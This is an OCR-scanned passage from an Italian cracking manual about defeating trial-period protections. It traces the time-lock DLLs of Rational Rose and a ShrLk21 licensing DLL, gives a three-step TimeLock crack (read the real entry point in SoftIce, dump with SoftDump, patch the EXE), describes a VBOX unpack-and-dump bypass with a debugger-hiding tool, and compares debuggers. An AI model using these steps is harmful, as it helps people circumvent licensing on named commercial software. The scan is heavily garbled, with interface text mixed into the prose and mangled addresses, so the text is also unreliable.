Possono esserci due posti in cui memorizzare tali dati. 
Il primo è in un directory comune a tutti i sistemi e BreakPoint Toggle F2 
precisamente la windows o la windows\system. = 


Il secondo posto è il registro di windows. Run Process FI 
Parlando di files dobbiamo ricordarci anche dei file A e paceBar 
.INI per cui se ad un certo punto dovessimo escludere — 

che le informazioni vengono messe nel registro dovremmo Goto Current Eip 

non solo cercare le funzioni OpenFile ecc. ma anche ‘ x 

quelle legate alla scrittura e lettura dentro a files Single Step Thru FB 
.INI. Single Step Into F7 
it questo argomento è trattato nell’apposito SESIA 


I file in cui vengono memorizzate le informazioni Auto Single Step Into FS 
relative alle installazioni dei programmi sono in genere 
con il nome che viene creato con: 


Terminate Process. ChlT 


Debugger Options. 


parte fissa + parte random . estensione 


Ad esempio nel mio sistema continuano a crescere i files. 


Questi files non sono veri ocx per cui potrebbero essere 

Comunque il sugo di tutto è che come target delle nostre ricerche sui sistemi 
time bombed possono essere adottati anche i metodi per la lettura delle 
informazioni relative alla data di sistema. 

Con queste informazioni partiamo sempre dal punto in cui le informazioni sono 
memorizzate dentro al registro. 

Se non troviamo funzioni di lettura ed interrogazione di questo proviamo andare 
a cercare se esistono altre funzioni legate all’apertura e lettura di files. 
Eravamo partiti dal discorso delle DLL associate ad un programma. 

Nei disassemblatori esiste la possibilità di andare ad analizzare una DLL letta 
in associazione al programma che seguiamo. 

Potremmo però fare un altra cosa e precisamente leggere a parte una DLL ed 
associarla ad un programma attivo. 

Per fare questo possiamo seguire la seguente procedura. 

L'opzione visibile qui a fianco ‘Attach to an active process’ permette di 
associare il modulo letto ad un processo attivo in quell’istante. 

Ad esempio quando si legge il file eseguibile ROSE.EXE, il quale testa il numero 
di giorni, ci si può notare che vengono lette anche le DLL 


ADVAPI32.DLL 
COMCTL32.DLL 
COMDLG32 .DLL 
GDI32.DLL 
IMM32.DLL 
KERNEL32.DLL 
MPR.DLL 
MSVCRT.DLL 
MSVCRT20.DLL 
MSWSOCK. DLL 
NETAPI32.DLL 
NETBIOS.DLL 
OLE32.DLL 
OLEAUT32.DLL 
OLEDLG.DLL 
RSCNDC22 .DLL 
RSCNPB22 .DLL 
SHELL32.DLL 
SHLWAPI.DLL 
TL31INJ.DLL 
USER32.DLL 
WININET.DLL 
WINSPOOL . DRV 
WS2_32.DLL 
WS2HELP.DLL 
WSOCK32 . DLL 


TL31INJ.DLL, RSCNPB22.DLL e RSCNDC22.DLL potrebbero essere legate a questa 
funzionalità (senza il potrebbero visto che si tratta delle DLL che gestiscono 
il timelock) 

Analizzandole con ScanBin o con QuickView viene fatto vedere che la prima 
RSCNDC22.DLL richiama la seconda direttamente.: 


DLL used : e:\Programmi\Rational\Rscndc22.dll 


COMDLG32 = c:\Windows\SYSTEM\COMDL6G32 .DLL 
GDI32 = c:\Windows\SYSTEM\GDI32.DLL 
KERNEL32 = c:\Windows\SYSTEM\KERNEL32 .DLL 
RSCNPB22 = e:\Programmi\Rational\Rscnpb22.dll 
USER32 = c:\Windows\SYSTEM\USER32.DLL 


(0) 


Undirect calls 


ADVAPI32 = c:\Windows\SYSTEM\ADVAPI32 .DLL 
COMCTL32 = c:\Windows\SYSTEM\COMCTL32.DLL 
SHELL32 = c:\Windows\SYSTEM\SHELL32.DLL 
SHLWAPI = c:\Windows\SYSTEM\SHLWAPI.DLL 
La DLL esporta queste due funzioni 


Exported functions : e:\Programmi\Rational\Rscndc22.dll 


0 ebCreateDebuggerA 
1 ebCreateDebuggerW 


e ne importa un certo numero che per motivi di spazio non riporto. 

Tra le funzioni importate comunque non risultano quelle legate alla gestione del 
registro. 

Sicuramente il caso riportato non si adatta alla spiegazione di un caso semplice 
in cui le ricerca delle funzioni di lettura della data attuale viene fatta alla 
luce del sole. 

Nel caso di sistemi che adottano i metodi TimeLock o Vbox bisogna in qualche 
modo superare lo scoglio relativo al fatto che solo alcune parti delle DLL sono 
in chiaro. 

Gran parte di queste sono codificate o packate per cui per riuscire a 
rintracciare tali funzioni di lettura della dataq bisogna o attendere che la 
parte che esegue l’unpack funzioni ed in ogni caso bisognerà utilizzare i 
programmi idonei per eseguire il dump. 

Alcune volte mi innervosisco per il fatto che i testi relativi ai sistemi di 
sprotezione che si trovano i rete si fermano tutti al fatto di rintracciare la 
fatidica GetDlgItemText. 

Sinceramente è almeno un anno che non riesco a trovare un sistema che permetta 
di rintracciare la funzione di serializzazione mediante la ricerca di questa 
fnzione. 

A questo punto considerando che nel file ROSE.EXE non sono utilizzate neppure li 
non rimane, prima di escludere che possano essere memorizzate informazioni 
dentro al registro, che vedere se sono utilizzate dentro alla seconda DLL. 
Neppure in questa ci sono riferimenti alle funzioni legate al registro. 

Vedremo tra poco che queste funzioni sono nella terza DLL. 

Supponendo che questa terza DLL non esista dovremmo a questo punto comunque 
pensare che il programma deve essere in grado di capire se è già stato 
installato. 

Se le informazioni fossero memorizzate dentro ad un file presente nella 
directory del programma, questo verrebbe eliminato con il delete della directory 
del programma. 

Sicuramente il file dovrà essere presente dentro ad un file nella directory di 
Windows o al limite dentro la system. 


Ora si tratta di stabilire se il file è un .INI oppure un file normale. 

Se si tratta di un file.INI allora potremo affidarci al gruppo di funzioni del 
tipo Get/WriteProfile*, Get/WritePrivateProfile* (vedi capitolo sulle API 
Windows). 

In caso di files allora sicuramente entreranno in ballo le funzioni legate al 
reperimento del path di Windows e Windows\System. 


KERNEL32 285 GetSystemDirectoryA 
KERNEL32 286 GetSystemDirectoryW 
KERNEL32 316 GetWindowsDirectoryA 
KERNEL32 317 GetWindowsDirectoryW 


Le funzioni precedenti sono state viste da ScanBin nella seconda DLL di 
RationalRose. 
La prima DLL letta in WDASM mostra tra le funzioni importate le seguenti 


RSCNPB22.ebClearBreakpoint 
RSCNPB22.ebClearBreakpointEx 
RSCNPB22.ebClearBreakpoint sEx 


Già le prime istruzioni di Rational Rose non lasciano sperare nulla di buono. 


:00955000 push [esp+0C] 
100955004 push [esp+0C] 
100955008 push [esp+0C] 
:0095500C push E6B0A125 
100955011 push 63B51C5C 
100955016 push E1F34295 
:0095501B call TL31INJ.?PleaseTraceIntoMe_MrCracker@@YGKKKPAEPAXKK@Z 
100955021 push FFFFFFFF 


Dalle istruzioni iniziali però risulta anche la chiamata ad una funzione dentro 
alla DLL TL31INJ.DLL. 

Infatti questa DLL era listata tra quelle attive all’attivazione di ROSE.EXE. 
Anche qui attiviamo ScanBin e vediamo quali meraviglie contiene. 

In questa DLL troviamo loe funzionbi che vanno aleggere dentro al registro. 


Imported functions : e:\Programmi\Rational\t131inj.dll 


ADVAPI32 301 RegOpenKeyA 
ADVAPI32 302 RegOpenKeyExA 
ADVAPI32 309 RegQueryValueA 
ADVAPI32 310 RegQueryValueExA 


Il codice, indipendemente da quello che fa la funzione, è il seguente. 


100955000 push [esp+0C] 

100955004 push [esp+0C] 

100955008 push [esp+t0C] 

:0095500C push E6B0A125 

100955011 push 63B51C5C 

100955016 push E1F34295 

:0095501B call TL31INJ.?PleaseTraceIntoMe_MrCracker@@YGKKKPAEPAXKK@Z 
:00955021 push FFFFFFFF 

100955026 call eax 

100955028 ret 000C 


Come potete vedere esiste tra le prime istruzioni la chiamata al sistema della 
protezione. 

L'indirizzo della seconda call è specificato in eax il cui valore è sicuramente 
settato dalla funzione chiamata precedentemente. 


Nel caso in cui il tempo di prova sia superato l’indirizzo della call in eax è 
relativo a quello di un ExitProcedure. 

Se non fosse scaduto sicuramente sarebbe stato quello di un entry point giusto. 
In condizioni normali, se si fosse analizzato e visto dove veniva inviata la 
call, appena installato il software magari s sarebbe potuta scrivere una patch 
cambiando la prima call con quella giusta. 

Ora che il software è scaduto si può solo seguire la DLL e vedere dove è 
memorizzata la data. 

La DLL quindi deve essere caricata e debuggata. 

E qui la vita si complica in quanto viene fatto all’interno un gioco simile a 
quello che avevo mostrato con i puntatori a funzione in cui in un array veniva 
messo il codice esadecimale di istruzioni assembler e poi l’indirizzo di questo 
array veniva, mediante un cast, assegnato ad un puntatore a funzione. 

In questo caso vengono inseriti codici ed indirizzi dentro allo stack e 
successivamente l’indirizzo dello stack viene inserito come vettore di un 
interrupt. 

Con precisione questo indirizzo viene salvato all'indirizzo fs:00000000. 
Riprendiamo il codice di prima. 


:00955000 push [esp+0C] 

100955004 push [esp+0C] 

100955008 push [esp+0C] 

:0095500C push E6B0A125 

:00955011 push 63B51C5C 

100955016 push E1F34295 

:0095501B call TL31INJ.?PleaseTraceIntoMe_MrCracker@@YGKKKPAEPAXKK@Z 
:00955021 push FFFFFFFF 

100955026 call eax 

:00955028 ret 000C 


Tramite le finestre di watch di WDASM diamo un occhiata a come si trova lo stack 
prima della call (a fianco ho inserito il push che lo ha generato). 


[esp+00000000] - e1f34295 .B.. €- :00955016 push E1F34295 
[esp+00000004] - 63b51c5c \..c €- :00955011 push 63B51C5C 
[esp+00000008] - e6b0a125 %... €- :0095500C push E6B0A125 
[esp+0000000C] - 000600000 .... €- :00955008 push [esp+0C] 
[esp+00000010] - 815fb5ac .._. €- :00955008 push [esp+0C] 
[esp+00000014] - 00a80000 .... €- :00955008 push [esp+0C] 


La funzione PleaseTraceIntoMe_ _MrCracker contiene all’inizio 


?PleaseTraceIntoMe_MrCracker@@YGKKKPAEPAXKKQ2Z ( ) 
:10013F20 mov eax, dword ptr fs:[00000000] €«- SALVA IL VALORE 
:10013F26 push ebp 
:10013F27 mov ebp, esp 
:10013F29 push FFFFFFFF 
:10013F2B push 10015E8E 
:10013F30 push eax 
:10013F31 mov dword ptr fs:[00000000], esp —£- E ORA LO SOSTITUISCE 
:10013F38 mov eax, 00006768 
:10013F3D sub esp, 00000004 
:10013F40 call TL31INJ.10029CB0 


Prendiamo lo stato dello stack prima dell'istruzione :10013F31 mov dword ptr 
fs:[00000000], esp che salva ad un certo indirizzo quello dello stack. 
Lo stato dello stack è ora 


[esp+00000000] - 00b8ff68 h... :10013F30 push eax 
[esp+00000004] - 10015e8e .4/.. :10013F2B push 10015E8E 
[esp+00000008] - ffffffff .... :10013F29 push FFFFFFFF 


[esp+0000000C] - 00b8ff78 x... :10013F26 push ebp 


[esp+00000010] - 00955021 !P.. INDIRIZZO DI RITORNO MESSO DALLA CALL 
CORRISPONDE ALLA PUSH FFFFF DOPO LA CALL 
A PleaseTraceIntoMe_MrCracker 

[espt+00000014] - e1f34295 .B.. FINO A QUESTO PUNTO LO ABBIAMO VISTO 

[esp+00000018] - 63b51c5c \..c 

[esp+0000001C] - e6b0a125 %... 

[esp+00000020] - 00000000 

[esp+00000024] - 815fb5ac 

[esp+00000028] - 00a80000 


In contrapposizione ad alcune DLL eccessivamente complesse ne esistono di troppo 
scontate. 
Ad esempio un certo programma xxxx.exe viene caricato con WDASM e dopo aver 
guardato quali DLL erano collegate ne risultava solo una appartenente al 
programma. 


ADVAPI32.DLL 
COMCTL32.DLL 
COMDLG32 . DLL 
GDI32.DLL 
KERNEL32 .DLL 
MPR.DLL 
OLE32.DLL 
OLEAUT32.DLL 
SHELL32.DLL 
SHRLK21.DLL <----------- QUESTA 
USER32 . DLL 
WINMM . DLL 


Guardando con ScanBin dentro a questa DLL veniva fuori: 


Exported functions : c:\Windows\SYSTEM\ShrLk21.dl1l 


0 GetDriveNumber 

1 GetStatus 

2 GetDLLVersion 

3 DoRegistration 

4 PassHandle 

5 ShowAboutDialog 

6 GetSerialNumber 

7 GetUserCompanyName 
8 GetUserName 

9 GetExpirationDate 
10 GetTryNumber 

11 InputUnlockCode 

12 GetTrialPeriodRemaining 
13 CheckProtectionDLL 


Chiaramente salta subito all’occhio GetExpirationDate. 

Clickando sulla DLL in WDASM viene richiesto se leggere la DLL. 

Dopo averla letta analizzando le funzioni importate vengono mostrate appunto 
quelle funzioni. 


CheckProtectionDLL 
DoRegistration 
GetDLLVersion 
GetDriveNumber 
GetExpirationDate 
GetSerialNumber 
GetStatus 
GetTrialPeriodRemaining 
GetTryNumber 


GetUserCompanyName 
GetUserName 
InputUnlockCode 
PassHandle 
ShowAboutDialog 
ShowAboutDialog 


Metto subito n breakpoint su GetExpirationDate e mando in esecuzione il 
programma. 

Spesso queste funzioni cosi vistose, se così si può dire, sono solo specchietti 
per le allodole. 

Se voi doveste scrivere delle funzioni per proteggere un vostro programma gli 
dareste dei noi così ? 

Comunque provare non costa nulla. 

Generalmente se sono funzioni per creare confusione non vengono neppure 
chiamate, per cui mettendo dei breakpoints non vi fermerete mai in quei punti. 
Usando SoftIce dovrete intervenire nel file winice.dat aggiungendo la linea 


EXP=<drive:><dir>\file.dll 


Chiaramente dopo aver inserito questa aggiunta dovrete resettare e rileggere 
SoftIce. 


VBOX INTORNO ALLA VERSIONE 4.xx 


Una delle protezioni più famose è sicuramente VBOX la quale esegue una codifica 
sui file che protegge. 

Il termine protezione non è adatto in quanto di fatto VBOX è quella che viene 
chiamata TIMELOCK ovvero quel modulo che permette di utilizzare il programma per 
X giorni. 

In uno dei capitoli precedenti abbiamo visto diverse utilities tra cui alcuni 
Dumper . 

Il bypass di VBOX necessità appunto di una di queste utility tipo SoftDump. 

Il cracking del codice con TimeLock si esegue in tre passi: 


1) Con softice si passa sopra alle chiamate alle DLL tl*inj.dll e ci si scrive a 
mano da qualche parte il valore di eax - l’ entry point reale. 


2) Con SoftDump si salva in un file una porzione di codice sufficientemente 
lungo partendo dal punto precedente. 


3) Eseguire la patch di questo codice dentro all’ EXE 


Con VBOX la procedura è simile ma un po più complessa. 

I file protetti con VBOX mantengono lo stesso nome dell’originale ma cambia 
qualche cosa nella struttura. 

Differentemente dai valori degli usuali .reloc e .rsrc esso ha una sezione 
PREVIEW puramente virtuale e una sezione WeijunLi la quale contiene alcune linee 
di codice e i dati packati. 

La protezione è composta da tre DLL: vboxp40, vboxb40 e vboxt40 di cui solo la 
prima è normale mentre le altre due sono packed. 

Quando il programma protetto parte richiama vboxp40.PreviewExecGate_By_ WeijunLi 
la quale esegue l’unpack dell’immagine del programma originale creando la 
sezione PREVIEW. 

Essa esegue anche l’unpack di alcune altre piccole sezioni che eseguono delle 
chiamate all’unicha funzione esportata da vboxb40.dll le quali esegue a sua 
volta una call a vboxt40.PreviewParadise_WJ. 


Per crackare VBOX è sufficiente attendere che questa faccia una parte del 
lavorodi unpacking e decrypting, salvare 
l’immagine con SoftDump e attaccare un 

Deep Paint Demo nuovo header PE fatto da noi. 

VBOX deve eseguire la funzione di lettore 

di se stesso, processare la sezione 

.idata, leggere i moduli GetProcAddress 

ecc. 

Da questo punto inizia il lavoro vero e 

proprio. 

Le informazioni sugli oggetti importati 

sono preprocessati e salvati in file files 

separati in forma fortemente encryptata. 
esi Soltanto quando una passa tutti i checks 
Iriomaion | allora le informazioni iniziano ad essere 
Qui processate e la tabella degli indirizzi 
importati della sezione .idata vengono 
riempiti con gli indirizzi reali. 

Così i contenuti originali della sezione 

.idata non sono mai esaustorati e quindi 

l’iniziale piano di attacco deve essere mutato. 

Bisogna dire che anche in questo caso le informazioni potrebbero valere solo 

come principio dato che queste metodologie sono in continua evoluzione. 

Chiaramente i metodi per la sprotezione vengono pubblicizzate per cui, 

dall’altra parte, i progettisti di questi sistemi continuano ad evolvere i loro 

software. 

Tra le varie evoluzioni possono esserci sistemi adatti a rintracciare i 

debugger, diversi metodi di codifica in modo che programmi come certi 

DUMPER/DECODER non funzionino e così via. 

Nelle versioni intorno alla 4.x di VBOX il concetto sul funzionamento di questo 

era, come spiegato prima, più semplice. 

Nella vecchia versione di VBOX esisteva una chiamata ad una funzione che 

eseguiva la decodifica di quanto codificato e che ritornando conteneva in EAX 

l’indirizzo della funzione di dove era il programma o della funzione di Exit. 

Il codice somigliava a 


: DEEP) PAIN 


“hemispherex 


Tools for the creative mind 


call 00462345 
push OFFFFFFF 
call eax 


Ybox Error 


La funzione che eseguiva l’unpack era K 

quella specificata a 00462345. (x) box has detected potential tantpering with: 

Nelle ultime versioni le cose sono FAPROGRAMMI\DEEPPAINTADEEPPAINT.EXE. 

cambiate tanto che software come Please reinstall this product to use it. If you 

coftice NeGessita fà di particolari still get this message. your installer may have 
cia i ) . problems and you will need to get a new copy. 

modifiche al fine di nascondere il 

debugger stesso a VBOX. If you are using a debugger. you must restart this 

FrogICE può servire a nascondere machine without it enabled to run this application. 

SoftiIce. 

FrogIce deve essere disabilitato mentre 

si legge il programma con il loader di 

SoftIce in quanto nasconderebbe anche 

al loader lo stesso. 

Quella che segue è la maschera che viene fuori con SoftIce. 

Se si cerca di leggere le informazioni riportate da alcuni programmi come 

ScanBin si ha come risposta 


General informations : e:\Programmi\DeepPaint\DeepPaint.exe 


Last update : 10/10/99 
File size : 196 608 byte(s) 
Module type : not DOS or WINDOWS executable 


Anche WDASM nell'ultima versione di VBOX crea problemi fin dall'inizio. 
Effettivamente esiste una differenza buona tra il codice creato tra WDASM e 
quello generato da IDA. 


:007571E2 or eax, esp 
:007571E4 xor eax, esp 
:007571E6 xor eax, ebp 
:007571E8 or eax, ebp 
:007571EA xor ah, al 
:007571EC xor eax, ebp 
:007571EE xor eax, ebp 
:007571F0 mov eax, ebp 
:007571F2 xor eax, ebp 
:007571F4 mov eax, ebp 
:007571F6 dec eax 


Il codice si riferisce ad una nuova versione di VBOX con cui WDASM fa a botte. 
Il codice generato da IDA invece è 


PREVIEW:00401000 ; File Name : E:\Programmi\DeepPaint\DeepPaint.exe 
PREVIEW:00401000 Format : Portable executable (PE) 
PREVIEW:00401000 Section 1. (virtual address 00001000) 
PREVIEW:00401000 Virtual size : 00355A24 (3496484. ) 
PREVIEW:00401000 Section size in file : 00000000 ( 0.) 


Offset to raw data for section: 00000000 

Flags E0000020: Text Executable Readable Writable 
Alignment : 16 bytes ? 

Exported entry 332. ?MemSize@CDIBLite@@QAEHXZ 


PREVIEW:00401000 
PREVIEW:00401000 
PREVIEW:00401000 
PREVIEW:00401000 
PREVIEW:00401000 
PREVIEW:00401000 —p586 

PREVIEW:00401000 model flat 

PREVIEW:00401000 

PREVIEW:00401000 ; Segment type: Pure code 

PREVIEW:00401000 PREVIEW segment para public 'CODE' use32 
PREVIEW:00401000 assume cs:PREVIEW 

PREVIEW:00401000 ;0rg 401000h 

PREVIEW: 00401000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:n 
ot 

PREVIEW:00401000 public ?MemSize@CDIBLite@@QAEHXZ 

PREVIEW:00401000 ; public: int _ thiscall CDIBLite::MemSize(void) 
PREVIEW:00401000 —?MemSize@CDIBLite@@QAEHXZ dd 4 dup(?) 
PREVIEW:00401010 ; Exported entry 10. ??0CDIBLite@@QAE@AAVO@@Z 
PREVIEW:00401010 public ??0CDIBLite@@QAE@AAVO@@Z 


TR RR RR RR RL 


WeijunLi:00757000 ; Section 2. (virtual address 00357000) 


WeijunLi:00757000 ; Virtual size : 00138A04 (1280516. ) 
WeijunLi:00757000 ; Section size in file : 00138A04 (1280516. ) 
WeijunLi:00757000 ; Offset to raw data for section: 00000400 


WeijunLi:00757000 ; Flags E2000060: Text Data Discardable Executable Readable 
Writable 

WeijunLi:00757000 ; Alignment : 16 bytes ? 

WeijunLi:00757000 ; Segment type: Pure data 


WeijunLi:00757000 WeijunLi segment para public 'DATA' use32 
WeijunLi:00757000 assume cs:WeijunLi 
WeijunLi:00757000 ;org 757000h 

WeijunLi:00757000 db 8Ah 
WeijunLi:00757001 db 11h 


PÒ 
Dentro alla sezione WeijunLi esiste lo START la cui ultima istruzione 
comprensibile equivale al salto alla routine loc_757241. 


Dopo il salto e prima di tale riferimento esistono solo dati non identificati 
come istruzioni. 


; SUBROUTINE 


public start 


start proc near 
sub eax, ebp 
or eax, ebp 


xOr  eax, eax 
mov eax, ebp 
xchg ah, al 

or eax, esp 
xor  eax, esp 
xor eax, ebp 
or eax, ebp 
xor ah, al 
xor eax, ebp 
xor eax, ebp 
mov eax, ebp 
xor eax, ebp 
mov eax, ebp 
dec eax 

xor eax, ebp 
Jz short $+2 
dec eax 

dec eax 

sub eax, ebp 
mov eax, fs 
Jz short $+2 
xOr  eax, eax 
inc eax 

jnz short $+2 
sub eax, ebp 
jnz short $+2 
jmp short loc_757241 


Come è possibile vedere il codice salta alla fine a loc_757241. 


loc_757241: ; CODE XREF: start+34 j 
push ebp 
mov ebp, esp 
add esp, OFFFFFFE8h 
push esi 
push edi 
mov esi, offset unk_757054 
mov eax, [ebp+8] 
MOV [esi+54h], eax 
push dword ptr [ebp+0Ch] 
pop dword ptr [esi+58h] 
mov eax, [ebp+10h] 
MOV [esi+5Ch], eax 


push esi 

call sub_757271 
pop edi 

pop esi 

leave 

retn Ch 


start endp ; sp= 4 


DIFFERENZE TRA I VARI DISASSEMBLATORI 


Abbiamo visto le caratteristiche di vari programmi considerati come i ferri del 
mestiere per il cracking. 

Sicuramente tanti programmi, anche indispensabili, possono essere considerati 
collaterali ma sicuramente i debugger/disassemblatori sono quelli fondamentali. 
Ne esiste, coma abbiamo visto, un ampia scelta, tutti c0Oon caratteristiche 
simili ma spesso con funzioni uniche. 

Quali sono i migliori e quali conviene usare ? 

Una risposta certa non esiste proprio per il fatto che alcune funzioni, utili in 
certi casi, sono presenti solo in alcuni di questi e quindi la valutazione deve 
essere fatta caso per caso. 

La soluzione migliore è quella di disporre di tutti e di usare al momento giusto 
quello che possiede le caratteristiche migliori per quel momento. 

Bisogna subito distinguere la differenza fondamentale. 

Esistono debugger che permettono di eseguire step by step il codice ed esistono 
disassemblatori che invece creano i sorgenti in assembler del programma in 
questione. 

WDASM ad esempio è un debugger/disassemblatore in quanto svolge tutte e due le 
funzioni. 

IDA è invece un potente disassemblatore. 

SoftIce è un debugger e cosi via considerando SOURCER, WinDbg ecc. 

Vediamo i debugger per capire quali sono le differenze sostanziali. 

La validità di un debugger non è tanto il modo con cui riesce a ricreare il 
sorgente (in fase di debug avere ricostruite le strutture, le direttive ecc. non 
è particolarmente interessante). 

Da parte di un debugger è invece da considerare la varietà dei metodi di 
visualizzazione dei dati e quella dei breakpoint disponibili. 

Esistono debugger che permettono di settare breakpoint molto semplici come ad 
esempio quelli relativi ad un indirizzo specifico (fermati quando questa 
istruzione viene eseguita) ma non dispongono di altri che permettono di 
identificare eventi particolari. 

Ad esempio SoftIce che è sicuramente quello più complesso per la varietà di 
breakpoint che possiede permette di settare breakpoint condizionali sfruttando 
un suo linguaggio, breakpoint su messaggi specifici di Windows, sulla chiamata 
di particolari funzioni importate ecc. 

WDASM invece è molto più semplice come varietà permettendo solo alcuni 
breakpoint su chiamate ad Api di Windows, su certe linee e pochi altri tipi. 
Esiste un'altra differenza sostanziale tra WDASM e SoftiIce. 

Il secondo è un debugger di sistema. 

Che cosa significa questo ? 

Quando in WDASM caricate un programma il sorgente assembler visualizzato, quello 
che potete seguire, è soltanto relativo a questo e quindi anche i breakpoint 
potete inserirli solo su questo. 

SoftIce invece essendo di sistema vi mostra il codice che il sistema stà 
eseguendo in quel caso. 

Windows possiede moltissimi processi attivi in concorrenza compresi i suoi 
interni come quelli ad esempio destinati a gestire il multitasking. 

Quando voi chiamate SoftIce potreste avere la visualizzazione del codice che sta 
eseguendo in quel istante che potrebbe essere anche relativo a funzioni sue del 
sistema operativo, di drivers ecc. 

SoftIce dispone di una grossa gamma di funzioni legate alla visualizzazione di 
informazioni. 

Ad esempio esistono i comandi per visualizzare i dati dei TASKS attivi, dei 
processi, delle Windows ecc. 

Nei comandi di creazione dei breakpoint SoftIce dispone della possibilità di 
specificare tra i parametri i valori dei tasks, processi o windows a cui volete 
che sia riferito quest’ultimo. 

Generalmente potreste chiedere che l’esecuzione venga sospesa nell’istante in 
cui viene chiamato un messaggio WM_DESTROY, ad esempio. 


Si. Ma a quale finestra vi interessa che sia riferito il messaggio ? 

In quell’istante potrebbero esserci diverse finestre attive. 

Mediante il comando HWND potreste richiedere d avere listati gli handles delle 
windows attive e successivamente utilizzare il valore relativo a quella che vi 
interessa per settarlo come parametro. 

Specificando 


BMSG 00CE WM_DESTROY 


Specifichereste che il sistema dovrebbe interrompere l’esecuzione nel caso in 
cui si verifichi un messaggio WM_DESTROY relativo all’handle della Window 00CE. 
Chiaramente un debugger come SoftIce è enormemente più potente di WDASM ma anche 
molto più complesso tanto che spesso e volentieri WDASM è molto più indirizzato 
a svolgere certe funzioni. 

A volte usare un camion in città diventa più complesso che usare un 500. 

WDASM inoltre dispone di una serie di finestre in cui le informazioni necessarie 
sono ben strutturate e visualizzate dentro a queste senza che dobbiate 
richiedere mediante comandi la visualizzazione di certe informazioni. 

Spesso i sorgenti assembler fanno riferimento ai registri utilizzati con valori 
d’indice. 


Mov eax+10h, 34h 


WDASM dispone di tutti i valori relativi ai registri i una comodissima finestra. 
SoftIce invece deve richiedere sempre con i comandi specilizzati la 
visualizzazione delle informazioni di questo tipo. 

Spesso la ricostruzione del sorgente richiede diversi passaggi da aparte 
dell’analizzatore. 

WDASM prima di visualizzare il sorgente esegue un analisi mentre SoftIce 
visualizza brutalmente la memoria come la vede in quell’istante. 

Infatti WDASM si riferisce ad un solo programma per cui prima di inziare 
l’esecuzione può permettersi di eseguire le varie passate relative alla 
ricostruzione del sorgente assembler. 

SoftIce riferendosi a tutto il software i memoria non può fare altro se non 
visualizzare un brutale assembler con al massimo la soffisticazione di 
visualizzare il nome del segmento!nomedellafunzione invece dell’indirizzo, 
dentro ad una call o ad un salto. 

Nel capitolo relativo alla prefazione alle ricerche abbiamo parlato sulla teoria 
generale legata a cosa cercare per individuare certe funzioni. 

Alcune volte, abbiamo visto, la vita è semplice perché mediante la ricerca di 
semplici GetDlgItemText identifichiamo subito dove sono posizionate le routines 
relative alla serializzazione di un programma. 

In questo caso l'utilizzo di WDASM è da consigliare rispetto a SoftIce. 

Altre volte la vita diventa complicata e l'individuazione di certe funzioni deve 
essere eseguita tramite breakpoint molto complessi cose che WDASM non possiede. 
In questo caso SoftIce diventa indicato. 

In altre parole si deve ripetere la metafora che ho utilizzato poco prima. 

Se dovete fare un lavoro molto pesante allora usate un camion tenendo presente 
che avrete difficoltà a fare manovre. 

Se invece il lavoro si presenta semplice prendete un utilitaria. 

Avrete la vita più semplice. 

SoftIce permette la creazione di diversi tipi di breakpoint diversificandoli 
anche per tipo di utilizzo di questi. 

Innanzi tutto la gestione dei breakpoint permette che questi vengano creati da 
altri breakpoint. 

Costrutti tipo 


bpx addr do “bpx addr” 
permettono di creare il secondo breakpoint quando si verifica il primo. 


Una delle differenze maggiori stà nel fatto che generalmente i breakpoint 
vengono settati sull’esecuzione di specifici indirizzi di memoria. 


SoftIce permette di specificare se i breakpoints devono essere settati sulla 
lettura, scrittura o esecuzione degli specifici indirizzi. 

SoftIce inoltre permette di generalizzare i breakpoint relativi a certe funzioni 
importate. 

In altre parole è possibile specificare di fermare l’esecuzione nel caso di una 
chiamata ad una funzione con 


bpx GetDblgItemTextA 


In WDASM invece è possibile richiamare la finestra delle funzioni importate e 
clickando sulle funzioni desiderate posizinarsi su ciascuna di queste nel punto 
dove sono situate nel programma inserendo i breakpoint dove si vule. 

Se nel programma esistono 50 richiami ad una specifica funzione sarà necessario 
clickare 50 volte posizionandosi su ciascuna di queste e settando dove si vuole 
il breakpoint. 

Volendo riassumere i vantaggi e gli svantaggi di WDASM e di SOFT ICE 


WDASM SOFTICE 

Visualizzazione dei valori dei registri|Visualizzazione dei valori da 
+ indici in una comoda window. richiedere tramite comandi. 

Numero di valori visualizzabili |Numero illimitato di valori 


stabiliti da quelli in una finestra con|visualizzabili in varie finestre dati. 
due valori utente realtivi ad indirizzi 


di memoria specificabili al momento. 


Sorgente assembler elaborato in più|Sorgente assembler brutale legato al 
passaggi e quindi abbastanza|codice in memoria. 
dettagliato. 


Breakpoint limitati a numero di linea 


Tipi di breakpoint elevato creati anche 


dell'istruzione. tramite linguaggio di Softice che 
Breakpoint legati alla chiamata di API|permette lacreazione di breakpoint 
windows. condizionali. 


I breakpoint sono la forza di Softice. 


Visualizzazione soltanto del codice del 
programma richiesto. 


Visualizzazione di tutto il codice nel 
sistema. 


Possibilità di salvare il sorgente. 


Sorgente non salvabile. 


In questa panoramica non ho preso in considerazione altri debugger perché troppo 
amatoriali oppure perché indirizzati ai sorgenti. 


Mi riferisco ai debugger forniti con i linguaggi Borland e Microsoft che 
dispongono di tante funzioni da usare con i propri linguaggi mediante 
compilazione debug di questi e quindi con le informazioni simboliche interne. 
Tra questi troviamo 
coo1DB32 il quale 
)» PEViewer E:\Cia\CrackMe.exe [Dj x| 1ncorpo ra al ._ Suo 
File Edit Debug Tool Help interno diverse 
& ap = utilities 
SAnXITFE*en9 
: - E quali un HexViewer, 
Unassemble | TreeView | Dumpview | Hexiew ig | Un Dump è pra 
ThreadlD FFF76087 ThreadHandle 00000087 FAX 0048C3DA disassembler. 
[DS:0047E1AC]=00000000 EBX 005B0000 Ricordo sempre che la 
AE DWOR PIF IODA/E TAI 000 IMAIDA EISDAE LAVO difficoltà in questo 
di ESI B15ED3C4 settore è quando si 
MOV EBP.ESP :0048C3E2 8BEC EDI 00000000 
PUSH ESI :0048C3E4 56 EBP QOGBFF78 ha a che fare con 
ne ; 0048C4D {+65} SE ALIEE 7565 FIRUZIIZA iI 
+ ; EIP 0048C3DA i utili 
PUSH 00000100 :0048C3E8 6800010000 ES MI? cui l'utilizzo del 
CALL 0O4SCECA :-* FUNCTION_0048CECA :0048C3ED E8D8040000 DS 017F semplice debugger non 
ADD ESP,+04 :0048C3F2 830404 ES 017F è sufficiente o 
MOV ESI, [EBP+08] :0048C3F5 887508 ss Dl perlomeno non è così 
A ta i NE re SI È el semplice come potrebbe 
| "] esserlo con un altro 


programma. 


Ora prendiamo in visione i disassemblatori e precisamente WDASM, IDA e SOURCER. 
WDASM lo abbiamo già visto 
parlando della sua parte 
debugger. 

or Sourcer è sicuramente uno dei 
Win Source Preproc ) i V3D2 s/n 94123456 (970324 più vecchi. 

